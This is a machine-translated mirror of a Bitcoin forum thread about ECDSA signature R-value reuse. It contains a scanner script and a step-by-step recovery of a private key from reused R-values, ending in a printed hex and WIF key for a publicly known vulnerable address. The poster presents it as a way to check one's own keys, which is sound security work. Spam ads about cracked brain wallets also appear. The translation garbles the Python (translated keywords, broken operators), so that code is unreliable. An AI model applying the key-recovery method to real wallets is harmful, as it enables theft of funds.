Вернуться   Биткоин Форум > Разработка и Техническое Обсуждение
5 марта 2015, 1:45:59 PM   # 1
 
 
Сообщения: 494
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Взлом Биткоин адресов.
500 Биткоинов взломаны в "мозговом кошельке" с паролем "bitcoin is awesome"
Адрес кошелька: 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE
Приватный ключ: 5J64pq77XjeacCezwmAr2V1s7snvvJkuAz8sENxw7xCkikceV6e
подробнее...


Всем кто хочет заработать Биткоины без вложений - рекомендую сайт http://bitcoin-zarabotat.ru
Здравствуй,

думал, что, может быть, кто-то может использовать сценарий ниже. Я просто написал ее, чтобы проверить пару моих открытых ключей для повторно используемых значений R-подписи, которые позволяют генераторные закрытого ключ пострадавших первичных ключей. Сценарий очень легкий и использует urllib2 для загрузки данных из blockchain.info. Так что нет локального узла BTC не требуется. Скрипт работает только для ключей с до 50 ТХ. Если ваш ключ получил более 50 ТЕ вы должны добавить несколько строк (добавить цикл и использовать дополнительные API-параметры предел а также смещение для разбора через все сделки [50+]). Кроме того, сценарий содержит много отладки-вывода, которые вы можете просто прокомментировать или удалить.
Это OpenSource и бета программное обеспечение - ИСПОЛЬЗОВАТЬ НА СВОЙ СТРАХ И РИСК - выпущен под GNU Public License.


Код:
#! / USR / бен / питон


################################################## ###############################
# #
# .______ _______. ______ ___ __ .__. #
# | _ \ / | / | / \ | \ | | #
# | | _) | ______ | (---- `|, ----» / ^ \ | \ | | #
# | / | ______ | \ \ | | / / _ \ \ | , `| #
# | | \ \ ----. .----) | | `----./ _____ \ | | \ | #
# | _ | `._____ | | _______ / \ ______ / __ / \ __ \ | __ | \ __ | v0.1.2 #
# #
#GNU PL - 2015 - ca333 #
# #        
#use НА СВОЙ СТРАХ И РИСК! #
################################################## ###############################

импорт JSON
импорт urllib2
время импорта
импорт SYS

# для какой-то причина blockchain.info Апи-цепи 59711 блоков короткая ..
blockstart = 170399
blockstart + = 59711
blockcount = urllib2.urlopen ("https://blockchain.info/de/q/getblockcount").читать()

Распечатать "WELCOME TO v0.1.2 R-сканирования!"

Распечатать "АДРЕС-R-SCAN: "
адр = raw_input ("Тип адрес:  ")
urladdr = "https://blockchain.info/de/rawaddr/" + Ул (адрес)
#control апи-URL
печать urladdr
addrdata = json.load (urllib2.urlopen (urladdr))
Распечатать "Данные для Публичных: " + Ул (адрес)
Распечатать "Количество передатчиков: " + Str (addrdata [ 'n_tx'])
# ОЙ-деталь:
у = 0
входов = []
в то время как у < addrdata [ 'n_tx']:
Распечатать "################################################## ###############################"
Распечатать "TX NR:" + Ул (у + 1)
Распечатать "хэш: " + Str (addrdata [ 'TXS'] [Y] [ 'хэш'])
Распечатать "Количество входов: " + Str (addrdata [ 'TXS'] [Y] [ 'vin_sz'])
#только если
#if addrdata [ 'TXS'] [у] [ 'vin_sz'] > 1:
ZY = 0
в то время как з.ы. < addrdata [ 'TXS'] [у] [ 'vin_sz']:
Распечатать "Ввод-ScriptNR " + Ул (ZY + 1) " :" + Str (addrdata [ 'TXS'] [Y] [ 'входы'] [ZY] [ 'Скрипт'])
inputs.append (addrdata [ 'TXS'] [у] [ 'входы'] [з.ы.] [ 'сценарий'])
ZY + 1 =

у + 1 =

Распечатать "Для сравнения: "

XI = 0
Zi = 1
Lenx = Len (входы)
Оповещение = 0

#compare значения Sig в каждом входном скрипте
в то время как хи < Lenx-1:
х = 0
а х < Lenx-цзы:
если входы [XI] [10:74] == входы [х + Zi] [10:74]:
Распечатать "В Input NR: " + Ул (XI) + "[Глобальный прирост] " + Ул (входы [XI])
печать ( '\ а')
                        Распечатать "Resued R-значение: "
печать входов [х + Zi] [10:74]
                        Оповещение + = 1

х + 1 =

Zi + 1 =
xi + 1 =

# Проверяет дубликаты
#alert, когда все в порядке

если предупреждение < 1:
Распечатать "Хорошо Публичный. Нет проблем."


sys.exit ()

если у вас есть вопросы спрашивайте.
Спасибо.
ca333 сейчас офлайн Пожаловаться на ca333   Ответить с цитированием Мультицитирование сообщения от ca333 Быстрый ответ на сообщение ca333


Как заработать Биткоины?
Без вложений. Не майнинг.


5 марта 2015, 2:03:20 PM   # 2
 
 
Сообщения: 1064
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Получил 1806 Биткоинов
Реальная история.





Хм очень интересно спасибо за обмен. Можете ли вы объяснить, кроме того, как просочились секретный ключ прибудет через ТЙ хэш? я помню, как люди говорят об этом было контрагент ошибкой и другие интернеты-кошельками, но я никогда не понимал, как кто-то может получить ПК от ОГО хэша.
coinableS сейчас офлайн Пожаловаться на coinableS   Ответить с цитированием Мультицитирование сообщения от coinableS Быстрый ответ на сообщение coinableS

5 марта 2015, 2:06:31 PM   # 3
 
 
Сообщения: 1344
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Отличная работа. Может у просьба дать шаг за шагом метод для запуска этого?
newIndia сейчас офлайн Пожаловаться на newIndia   Ответить с цитированием Мультицитирование сообщения от newIndia Быстрый ответ на сообщение newIndia

5 марта 2015, 3:47:52 PM   # 4
 
 
Сообщения: 494
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

ЭТО ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЯХ. ПОЖАЛУЙСТА, НЕ НАВРЕДИТ ДРУГИМ!

Хм очень интересно спасибо за обмен. Можете ли вы объяснить, кроме того, как просочились секретный ключ прибудет через ТЙ хэш? я помню, как люди говорят об этом было контрагент ошибкой и другие интернеты-кошельками, но я никогда не понимал, как кто-то может получить ПК от ОГО хэша.


Мы не получаем закрытый ключ из хэша. мы получаем его из сценариев.
Когда BTC-ТХ генерируется он должен быть подписан. но многие разработчики из кода BTC-услуг их
своя "кошелек-система" поэтому они делают все это от своего программного обеспечения и при их подписи процедуры resuses
подписывая значения, то она с легко генерировать закрытый ключ от этого. входные сценарии транзакции содержит
два значения подписи. я позвонить с и р. поэтому, когда у нас есть 2 входа или больше в транзакции или различные входы от разных
транзакции (из тех же PublicKey) и повторно использованы значения г он с огромной проблемой для безопасности. ECDSA затем позволяет пересчитывать с кривой.

формула:
Код:
PrivateKey = (sop1 * с2 - sop2 * S1) / (г * (s1-s2))

теперь только sop1 и sop2 отсутствует! Эти хэши выходов должны быть подписаны. Кроме того, это рассчитывается OP_CHECKSIG.
поэтому у нас есть все данные для расчета секретного ключа.

поэтому я сделать пример в настоящее время:

Открытый ключ: 1BFhrfTTZP3Nw4BNy4eX4KFLsn9ZeijcMm (я беру этот пример, потому что эта уязвимость общественности уже)
мой сценарий скажите мне, что мы имеем дубликаты сделки: 9ec4bc49e828d924af1d1029cacf709431abbde46d59554b62bc270e3b29c4b1

сценарий ввода 1:
30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1022044e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e0104dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69 c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff

сценарий ввода 2:
30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad102209a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab0104dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69c2 1e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff

первый я должен объяснить вам входы формата сценария заголовка Descr:

0x30 = Байт заголовка
0x44 = Длина дескриптора (68 байт)
0x02 = Байт заголовка
0x20 = Длина г значение дескриптора (32 байта)
d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1 координата г как большой Endian целое
0x02 = Байт заголовка
0x20 = S значение длины дескриптора (32 байта)
44e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e в s1 координат и 9a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab s2 координат, как большой Endian целое
0x01 = HashType байт
и 04dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69c2 1e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff является pubkeyhash


ОК, так что теперь мы знаем, как отформатированные входы сценарий. Теперь мы рассчитали недостающую sop1 и sop2 по OP_CHECKSIG ():
sop1: c0e2d0a89a348de88fda08211c70d1d7e52ccef2eb9459911bf977d587784c6e
sop2: 17b0f41c8c337ac1e18c98759e83a8cccbc368dd9d89e5f03cb633c265fd0ddc

так что мы теперь имеем данные Л.Л. для расчета:

Код:
р = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
г = 0xd47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1
s1 = 0x44e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e
с2 = 0x9a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab
sop1 = 0xc0e2d0a89a348de88fda08211c70d1d7e52ccef2eb9459911bf977d587784c6e
sop2 = 0x17b0f41c8c337ac1e18c98759e83a8cccbc368dd9d89e5f03cb633c265fd0ddc

Теперь мы можем вычислить с ниже формулами: Mathcad или sagemath и мы получаем privkey.
вписатьтся примечание п является заказ на поле. п = Параметр для secp256k1 порядка кривой, которая Биткойн использования.

Теперь мы создаем конечное поле для расчета:
Код:
К = GF (р)

и вычислить десятичный закрытый ключ внутри этой области с:
Код:
К ((z1 * с2 - * 2 * S1) / (г * (S1-S2)))

Ouput: 88865298299719117682218467295833367085649033095698151055007620974294165995414

поэтому, когда мы получаем закодировать собства-ключ шестигранной кодировки:
c477f9f65c22cce20657faa5b2d1d8122336f851a508a1ed04e479c34985bf96

и при преобразовании в WIF формате:
5KJp7KEffR7HHFWSFYjiCUAntRSTY69LAQEX1AUzaSBHHFdKEpQ

я надеюсь, что это поможет вам понять.

также: здесь реализация для расчета с помощью программного обеспечения: https://gist.github.com/nlitsme/dda36eeef541de37d996
надеюсь, что это ясно и помог.
Спасибо
ca333 сейчас офлайн Пожаловаться на ca333   Ответить с цитированием Мультицитирование сообщения от ca333 Быстрый ответ на сообщение ca333

5 марта 2015, 4:17:46 PM   # 5
 
 
Сообщения: 1064
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Спасибо за это объяснение и разбить его так легко понять.

По крайней мере, только адреса отработанных выходов через веб-кошелек которые, возможно, в опасности, так что это хорошо для меня, как я держу очень небольшое количество в них. Держите холодное хранение холодным и только держать небольшое количество в ваших кошельках горячих / расходов.
coinableS сейчас офлайн Пожаловаться на coinableS   Ответить с цитированием Мультицитирование сообщения от coinableS Быстрый ответ на сообщение coinableS

5 марта 2015, 4:20:45 PM   # 6
 
 
Сообщения: 2478
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Эй прикольный гаджет человек! Спасибо за это с открытым исходным кодом. 
RodeoX сейчас офлайн Пожаловаться на RodeoX   Ответить с цитированием Мультицитирование сообщения от RodeoX Быстрый ответ на сообщение RodeoX

5 марта 2015, 4:23:24 PM   # 7
 
 
Сообщения: 157
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

ВАУ!! спасибо очень много для совместного использования и для этого подробного объяснения. очень интересно! я также всегда держать свою монету в coldstorage или мой bitcoinode, который подключен через оружейную.
zen2 сейчас офлайн Пожаловаться на zen2   Ответить с цитированием Мультицитирование сообщения от zen2 Быстрый ответ на сообщение zen2

5 марта 2015, 4:25:33 PM   # 8
 
 
Сообщения: 686
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Спасибо за это объяснение и разбить его так легко понять.

По крайней мере, только адреса отработанных выходов через веб-кошелек которые, возможно, в опасности, так что это хорошо для меня, как я держу очень небольшое количество в них. Держите холодное хранение холодным и только держать небольшое количество в ваших кошельках горячих / расходов.
Это действительно хороший совет, рекомендовал бы его кому-либо. Читая этот пост на самом деле получил меня лил немного напуганы, Prolly собирающегося сделать некоторые бумаги бумажников BRB
najzenmajsen сейчас офлайн Пожаловаться на najzenmajsen   Ответить с цитированием Мультицитирование сообщения от najzenmajsen Быстрый ответ на сообщение najzenmajsen

5 марта 2015, 4:47:09 PM   # 9
 
 
Сообщения: 494
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Спасибо за это объяснение и разбить его так легко понять.

По крайней мере, только адреса отработанных выходов через веб-кошелек которые, возможно, в опасности, так что это хорошо для меня, как я держу очень небольшое количество в них. Держите холодное хранение холодным и только держать небольшое количество в ваших кошельках горячих / расходов.

да в основном онлайн бумажники / услугу. но, к сожалению, не только онлайн бумажники. я видел много дроидов технологии с теми же проблемами. и наиболее проблематичен клоны cryptocoins, которые используют этот старый андроид клоны бумажника. я уже предупреждал разработчиков, но многие не понимают, Что не хорошо.

я рекомендую систему песочницы для обработки BTC и / или холодного хранение (бумага & ЧИСТЫЙ USB Flash). Пример У меня есть компьютер с моим Bitcoins и только могу соединиться с собственной writed ИК-модулем для datatranser подписанных сделок. так что только может выйти через ИК-порт к моему подключенного к Интернету компьютера. и это есть скрипт, который принимать данные ИК и сделать все остальное. Все началось с небольшим adruino эксперимента я сделал с другом

люди часто не понимают, что окружающая среда должна быть безопасной. шифрование и пароли бесполезно, когда окружающая среда не является безопасной. Пример у вас есть супер обеспеченный компьютер с песочницей (VM) и биткоен Цфатом здесь. но хакер идет в вашем компьютере с червячным / взрывающимся / трояном, а затем ждет вас ввести пароль или ключи, а затем все украдено .. так самое главное, безопасный компьютер хороший или сделать его в сети (нет сети т.е. связи rj45, Wi-Fi) когда она с для Bitcoin.
ca333 сейчас офлайн Пожаловаться на ca333   Ответить с цитированием Мультицитирование сообщения от ca333 Быстрый ответ на сообщение ca333

5 марта 2015, 5:17:59 PM   # 10
 
 
Сообщения: 490
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Спасибо за это объяснение и разбить его так легко понять.

По крайней мере, только адреса отработанных выходов через веб-кошелек которые, возможно, в опасности, так что это хорошо для меня, как я держу очень небольшое количество в них. Держите холодное хранение холодным и только держать небольшое количество в ваших кошельках горячих / расходов.

да в основном онлайн бумажники / услугу. но, к сожалению, не только онлайн бумажники. я видел много дроидов технологии с теми же проблемами. и наиболее проблематичен клоны cryptocoins, которые используют этот старый андроид клоны бумажника. я уже предупреждал разработчиков, но многие не понимают, Что не хорошо.

я рекомендую систему песочницы для обработки BTC и / или холодного хранение (бумага & ЧИСТЫЙ USB Flash). Пример У меня есть компьютер с моим Bitcoins и только могу соединиться с собственной writed ИК-модулем для datatranser подписанных сделок. так что только может выйти через ИК-порт к моему подключенного к Интернету компьютера. и это есть скрипт, который принимать данные ИК и сделать все остальное. Все началось с небольшим adruino эксперимента я сделал с другом

люди часто не понимают, что окружающая среда должна быть безопасной. шифрование и пароли бесполезно, когда окружающая среда не является безопасной. Пример у вас есть супер обеспеченный компьютер с песочницей (VM) и биткоен Цфатом здесь. но хакер идет в вашем компьютере с червячным / взрывающимся / трояном, а затем ждет вас ввести пароль или ключи, а затем все украдено .. так самое главное, безопасный компьютер хороший или сделать его в сети (нет сети т.е. связи rj45, Wi-Fi) когда она с для Bitcoin.

Можете ли вы сказать, какой дроид бумажники использовать его? Спасибо за размещение этого.

Большинство моего Bitcoins уже на бумажных бумажники из чистой системы Ubunutu (не подключен к Интернету, старый принтер не подключен к Интернету, и т.д.). Но я до сих пор использовать горячий бумажник иногда платить человек.
MakingMoneyHoney сейчас офлайн Пожаловаться на MakingMoneyHoney   Ответить с цитированием Мультицитирование сообщения от MakingMoneyHoney Быстрый ответ на сообщение MakingMoneyHoney

5 марта 2015, 5:23:56 PM   # 11
 
 
Сообщения: 1736
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Спасибо за это объяснение и разбить его так легко понять.

По крайней мере, только адреса отработанных выходов через веб-кошелек которые, возможно, в опасности, так что это хорошо для меня, как я держу очень небольшое количество в них. Держите холодное хранение холодным и только держать небольшое количество в ваших кошельках горячих / расходов.

да в основном онлайн бумажники / услугу. но, к сожалению, не только онлайн бумажники. я видел много дроидов технологии с теми же проблемами. и наиболее проблематичен клоны cryptocoins, которые используют этот старый андроид клоны бумажника. я уже предупреждал разработчиков, но многие не понимают, Что не хорошо.

я рекомендую систему песочницы для обработки BTC и / или холодного хранение (бумага & ЧИСТЫЙ USB Flash). Пример У меня есть компьютер с моим Bitcoins и только могу соединиться с собственной writed ИК-модулем для datatranser подписанных сделок. так что только может выйти через ИК-порт к моему подключенного к Интернету компьютера. и это есть скрипт, который принимать данные ИК и сделать все остальное. Все началось с небольшим adruino эксперимента я сделал с другом

люди часто не понимают, что окружающая среда должна быть безопасной. шифрование и пароли бесполезно, когда окружающая среда не является безопасной. Пример у вас есть супер обеспеченный компьютер с песочницей (VM) и биткоен Цфатом здесь. но хакер идет в вашем компьютере с червячным / взрывающимся / трояном, а затем ждет вас ввести пароль или ключи, а затем все украдено .. так самое главное, безопасный компьютер хороший или сделать его в сети (нет сети т.е. связи rj45, Wi-Fi) когда она с для Bitcoin.

Можете ли вы сказать, какой дроид бумажники использовать его? Спасибо за размещение этого.

Большинство моего Bitcoins уже на бумажных бумажники из чистой системы Ubunutu (не подключен к Интернету, старый принтер не подключен к Интернету, и т.д.). Но я до сих пор использовать горячий бумажник иногда платить человек.

Возможно, ссылаясь на плохой ГСЧ на андроиде от около 18 месяцев назад:
https://bitcoin.org/en/alert/2013-08-11-android
cr1776 сейчас офлайн Пожаловаться на cr1776   Ответить с цитированием Мультицитирование сообщения от cr1776 Быстрый ответ на сообщение cr1776

5 марта 2015, 5:39:29 PM   # 12
 
 
Сообщения: 490
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Спасибо за это объяснение и разбить его так легко понять.

По крайней мере, только адреса отработанных выходов через веб-кошелек которые, возможно, в опасности, так что это хорошо для меня, как я держу очень небольшое количество в них. Держите холодное хранение холодным и только держать небольшое количество в ваших кошельках горячих / расходов.

да в основном онлайн бумажники / услугу. но, к сожалению, не только онлайн бумажники. я видел много дроидов технологии с теми же проблемами. и наиболее проблематичен клоны cryptocoins, которые используют этот старый андроид клоны бумажника. я уже предупреждал разработчиков, но многие не понимают, Что не хорошо.

я рекомендую систему песочницы для обработки BTC и / или холодного хранение (бумага & ЧИСТЫЙ USB Flash). Пример У меня есть компьютер с моим Bitcoins и только могу соединиться с собственной writed ИК-модулем для datatranser подписанных сделок. так что только может выйти через ИК-порт к моему подключенного к Интернету компьютера. и это есть скрипт, который принимать данные ИК и сделать все остальное. Все началось с небольшим adruino эксперимента я сделал с другом

люди часто не понимают, что окружающая среда должна быть безопасной. шифрование и пароли бесполезно, когда окружающая среда не является безопасной. Пример у вас есть супер обеспеченный компьютер с песочницей (VM) и биткоен Цфатом здесь. но хакер идет в вашем компьютере с червячным / взрывающимся / трояном, а затем ждет вас ввести пароль или ключи, а затем все украдено .. так самое главное, безопасный компьютер хороший или сделать его в сети (нет сети т.е. связи rj45, Wi-Fi) когда она с для Bitcoin.

Можете ли вы сказать, какой дроид бумажники использовать его? Спасибо за размещение этого.

Большинство моего Bitcoins уже на бумажных бумажники из чистой системы Ubunutu (не подключен к Интернету, старый принтер не подключен к Интернету, и т.д.). Но я до сих пор использовать горячий бумажник иногда платить человек.


Возможно, ссылаясь на плохой ГСЧ на андроиде от около 18 месяцев назад:
https://bitcoin.org/en/alert/2013-08-11-android


Но эта страница говорит, что это было зафиксировано с "текущий" Обновления по состоянию на 2013 г. и ФП говорят в настоящее время 2015.
MakingMoneyHoney сейчас офлайн Пожаловаться на MakingMoneyHoney   Ответить с цитированием Мультицитирование сообщения от MakingMoneyHoney Быстрый ответ на сообщение MakingMoneyHoney

5 марта 2015, 5:59:00 PM   # 13
 
 
Сообщения: 494
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Спасибо за это объяснение и разбить его так легко понять.

По крайней мере, только адреса отработанных выходов через веб-кошелек которые, возможно, в опасности, так что это хорошо для меня, как я держу очень небольшое количество в них. Держите холодное хранение холодным и только держать небольшое количество в ваших кошельках горячих / расходов.

да в основном онлайн бумажники / услугу. но, к сожалению, не только онлайн бумажники. я видел много дроидов технологии с теми же проблемами. и наиболее проблематичен клоны cryptocoins, которые используют этот старый андроид клоны бумажника. я уже предупреждал разработчиков, но многие не понимают, Что не хорошо.

я рекомендую систему песочницы для обработки BTC и / или холодного хранение (бумага & ЧИСТЫЙ USB Flash). Пример У меня есть компьютер с моим Bitcoins и только могу соединиться с собственной writed ИК-модулем для datatranser подписанных сделок. так что только может выйти через ИК-порт к моему подключенного к Интернету компьютера. и это есть скрипт, который принимать данные ИК и сделать все остальное. Все началось с небольшим adruino эксперимента я сделал с другом

люди часто не понимают, что окружающая среда должна быть безопасной. шифрование и пароли бесполезно, когда окружающая среда не является безопасной. Пример у вас есть супер обеспеченный компьютер с песочницей (VM) и биткоен Цфатом здесь. но хакер идет в вашем компьютере с червячным / взрывающимся / трояном, а затем ждет вас ввести пароль или ключи, а затем все украдено .. так самое главное, безопасный компьютер хороший или сделать его в сети (нет сети т.е. связи rj45, Wi-Fi) когда она с для Bitcoin.

Можете ли вы сказать, какой дроид бумажники использовать его? Спасибо за размещение этого.

Большинство моего Bitcoins уже на бумажных бумажники из чистой системы Ubunutu (не подключен к Интернету, старый принтер не подключен к Интернету, и т.д.). Но я до сих пор использовать горячий бумажник иногда платить человек.

Возможно, ссылаясь на плохой ГСЧ на андроиде от около 18 месяцев назад:
https://bitcoin.org/en/alert/2013-08-11-android


в точку. плохие значения подписи проблема, как описано в первом посте.



Спасибо за это объяснение и разбить его так легко понять.

По крайней мере, только адреса отработанных выходов через веб-кошелек которые, возможно, в опасности, так что это хорошо для меня, как я держу очень небольшое количество в них. Держите холодное хранение холодным и только держать небольшое количество в ваших кошельках горячих / расходов.

да в основном онлайн бумажники / услугу. но, к сожалению, не только онлайн бумажники. я видел много дроидов технологии с теми же проблемами. и наиболее проблематичен клоны cryptocoins, которые используют этот старый андроид клоны бумажника. я уже предупреждал разработчиков, но многие не понимают, Что не хорошо.

я рекомендую систему песочницы для обработки BTC и / или холодного хранение (бумага & ЧИСТЫЙ USB Flash). Пример У меня есть компьютер с моим Bitcoins и только могу соединиться с собственной writed ИК-модулем для datatranser подписанных сделок. так что только может выйти через ИК-порт к моему подключенного к Интернету компьютера. и это есть скрипт, который принимать данные ИК и сделать все остальное. Все началось с небольшим adruino эксперимента я сделал с другом

люди часто не понимают, что окружающая среда должна быть безопасной. шифрование и пароли бесполезно, когда окружающая среда не является безопасной. Пример у вас есть супер обеспеченный компьютер с песочницей (VM) и биткоен Цфатом здесь. но хакер идет в вашем компьютере с червячным / взрывающимся / трояном, а затем ждет вас ввести пароль или ключи, а затем все украдено .. так самое главное, безопасный компьютер хороший или сделать его в сети (нет сети т.е. связи rj45, Wi-Fi) когда она с для Bitcoin.

Можете ли вы сказать, какой дроид бумажники использовать его? Спасибо за размещение этого.

Большинство моего Bitcoins уже на бумажных бумажники из чистой системы Ubunutu (не подключен к Интернету, старый принтер не подключен к Интернету, и т.д.). Но я до сих пор использовать горячий бумажник иногда платить человек.


Возможно, ссылаясь на плохой ГСЧ на андроиде от около 18 месяцев назад:
https://bitcoin.org/en/alert/2013-08-11-android


Но эта страница говорит, что это было зафиксировано с "текущий" Обновления по состоянию на 2013 г. и ФП говорят в настоящее время 2015.

не все forker адаптированы к их обновления вилочных ветвей и клонов.

бумажник BTC для андроида является фиксированным и "безопасный" относительно вопроса ГСЧ.
ca333 сейчас офлайн Пожаловаться на ca333   Ответить с цитированием Мультицитирование сообщения от ca333 Быстрый ответ на сообщение ca333

5 марта 2015, 6:02:45 PM   # 14
 
 
Сообщения: 1736
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Спасибо за это объяснение и разбить его так легко понять.

По крайней мере, только адреса отработанных выходов через веб-кошелек которые, возможно, в опасности, так что это хорошо для меня, как я держу очень небольшое количество в них. Держите холодное хранение холодным и только держать небольшое количество в ваших кошельках горячих / расходов.

да в основном онлайн бумажники / услугу. но, к сожалению, не только онлайн бумажники. я видел много дроидов технологии с теми же проблемами. и наиболее проблематичен клоны cryptocoins, которые используют этот старый андроид клоны бумажника. я уже предупреждал разработчиков, но многие не понимают, Что не хорошо.

я рекомендую систему песочницы для обработки BTC и / или холодного хранение (бумага & ЧИСТЫЙ USB Flash). Пример У меня есть компьютер с моим Bitcoins и только могу соединиться с собственной writed ИК-модулем для datatranser подписанных сделок. так что только может выйти через ИК-порт к моему подключенного к Интернету компьютера. и это есть скрипт, который принимать данные ИК и сделать все остальное. Все началось с небольшим adruino эксперимента я сделал с другом

люди часто не понимают, что окружающая среда должна быть безопасной. шифрование и пароли бесполезно, когда окружающая среда не является безопасной. Пример у вас есть супер обеспеченный компьютер с песочницей (VM) и биткоен Цфатом здесь. но хакер идет в вашем компьютере с червячным / взрывающимся / трояном, а затем ждет вас ввести пароль или ключи, а затем все украдено .. так самое главное, безопасный компьютер хороший или сделать его в сети (нет сети т.е. связи rj45, Wi-Fi) когда она с для Bitcoin.

Можете ли вы сказать, какой дроид бумажники использовать его? Спасибо за размещение этого.

Большинство моего Bitcoins уже на бумажных бумажники из чистой системы Ubunutu (не подключен к Интернету, старый принтер не подключен к Интернету, и т.д.). Но я до сих пор использовать горячий бумажник иногда платить человек.


Возможно, ссылаясь на плохой ГСЧ на андроиде от около 18 месяцев назад:
https://bitcoin.org/en/alert/2013-08-11-android


Но эта страница говорит, что это было зафиксировано с "текущий" Обновления по состоянию на 2013 г. и ФП говорят в настоящее время 2015.

Это верно, но, как показано ниже, что является ссылкой на последние вопросы.

cr1776 сейчас офлайн Пожаловаться на cr1776   Ответить с цитированием Мультицитирование сообщения от cr1776 Быстрый ответ на сообщение cr1776

6 марта 2015, 4:02:23 AM   # 15
 
 
Сообщения: 1288
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Очень хороший инструмент, спасибо
viboracecata сейчас офлайн Пожаловаться на viboracecata   Ответить с цитированием Мультицитирование сообщения от viboracecata Быстрый ответ на сообщение viboracecata

6 марта 2015, 8:31:38 AM   # 16
 
 
Сообщения: 1078
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Это сообщение было слишком стар и продут
Evil-Knievel сейчас офлайн Пожаловаться на Зла-Knievel   Ответить с цитированием Мультицитирование сообщения от Evil-Knievel Быстрый ответ на сообщение Evil-Knievel

6 марта 2015, 2:08:00 PM   # 17
 
 
Сообщения: 1610
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Это программное обеспечение является большим, но не дает никакой ценности для пользователей.
Я уверен, что повторно используемые значения R будут обнаружены в течение миллисекунд и закрытых ключей опустели сразу.
Так что, если ваши средства ушли, вы повторно значение R 😉
Это было то, что я собирался сказать. Любое повторно использовать R-значение будет обнаружено и использовано в течение 20 секунд.
Помните, помните 5 ноября сейчас офлайн Пожаловаться на Помните, помните 5 ноября   Ответить с цитированием Мультицитирование сообщения от Помните помню 5 ноября Быстрый ответ на сообщение Помните, помните 5 ноября

6 марта 2015, 4:09:25 PM   # 18
 
 
Сообщения: 494
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Это программное обеспечение является большим, но не дает никакой ценности для пользователей.
Я уверен, что повторно используемые значения R будут обнаружены в течение миллисекунд и закрытых ключей опустели сразу.
Так что, если ваши средства ушли, вы повторно значение R 😉

не "Любые" так как низкие ключи баланса не заинтересованы в плохих парней. я условие, что это для тестирования / образовательных целей.
если я узнать, что делает вред пользователей / БТК-сообщества будут удалены все. также услуги я finded вне имеют ГСЧ vuln я напрямую
импортирован баланс и контактировали разработчиков. я думаю, что никто с exsisting БТК-службы не имеют ГСЧ вопрос больше. также все pubkeys с более 50BTC или более баланса защищены.

и я лишний только при условии, легкий сценарий. так с этой технологией (JSON запроса HTTP) без возможности сканирования быстро. если портирован в ansic и используется на HighEnd сервере с собственным blockchain я могу сканировать / сравнить все входы цепи в кратчайшие сроки. но я думаю, что это люди, которые в состоянии сделать это, есть моральный компас и не делать этого ... badguys в большинстве случаев не очень мыслительные.


Кроме того, если кто-то заинтересован в большем количестве вещей я начать в ближайшее время выпустит свой scriptbase и программное обеспечение на GitHub. (Ca333)
это все, для БТК-безопасности и некоторые cryptocurrencies безопасности.

Спасибо.

ca333 сейчас офлайн Пожаловаться на ca333   Ответить с цитированием Мультицитирование сообщения от ca333 Быстрый ответ на сообщение ca333

7 марта 2015, 1:09:14 PM   # 19
 
 
Сообщения: 494
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

Здравствуй,

Некоторые спрашивали меня из-за г-значения не отображаются правильно, но вы должны смотреть на г дескриптора значение длины во входном скрипте я descriped формата входы выше сообщений. а потом только менять: индексы углеродно массив для правильной длины. например, это для 64 символов = 32byte Длина г-значения.

Код:
